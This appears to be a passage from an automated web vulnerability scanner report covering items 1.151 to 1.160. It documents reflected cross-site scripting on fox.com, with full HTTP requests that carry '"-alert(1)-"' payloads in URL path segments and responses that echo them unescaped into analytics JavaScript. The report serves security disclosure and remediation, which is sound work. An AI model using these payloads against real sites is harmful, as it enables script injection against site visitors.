Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui8df44"-alert(1)-"519baa039a9/fox_player/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 21904
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_
...[SNIP]...

1.151. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9233"-alert(1)-"c89ee70262d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playera9233"-alert(1)-"c89ee70262d/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_play
...[SNIP]...

1.152. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896b7"-alert(1)-"3ed23f0e348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf896b7"-alert(1)-"3ed23f0e348/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21764
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf896b7"-alert(1)-"3ed23f0e348"
s_analytics.prop15="sub section:foxanalyticsextension" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.153. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4335e"-alert(1)-"0accea0a5eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui4335e"-alert(1)-"0accea0a5eb/fox_player/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21880
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin"
s_analytics.hier1="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4335e"-ale
...[SNIP]...

1.154. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e53"-alert(1)-"a2469b6ef49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player91e53"-alert(1)-"a2469b6ef49/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin"
s_analytics.hier1="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player91e53"-ale
...[SNIP]...

1.155. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f3fa"-alert(1)-"6314bb53e69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf4f3fa"-alert(1)-"6314bb53e69/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21740
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf4f3fa"-alert(1)-"6314bb53e69"
s_analytics.prop15="sub section:foxlayoutplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analyti
...[SNIP]...

1.156. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c64f"-alert(1)-"60e8ceb9474 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui3c64f"-alert(1)-"60e8ceb9474/fox_player/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor"
s_analytics.hier1="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3c64
...[SNIP]...

1.157. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b7d"-alert(1)-"495dd8f1e73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player29b7d"-alert(1)-"495dd8f1e73/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21864
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor"
s_analytics.hier1="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player29b7
...[SNIP]...

1.158. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56b6e"-alert(1)-"81daa3b06d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf56b6e"-alert(1)-"81daa3b06d4/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21752
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf56b6e"-alert(1)-"81daa3b06d4"
s_analytics.prop15="sub section:foxomnituremonitor" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_anal
...[SNIP]...

1.159. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f141d"-alert(1)-"e64e46fa8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uif141d"-alert(1)-"e64e46fa8a2/fox_player/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd"
s_analytics.hier1="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uif141d"-alert(1)-"e64e46f
...[SNIP]...

1.160. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7276"-alert(1)-"48fb49619f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

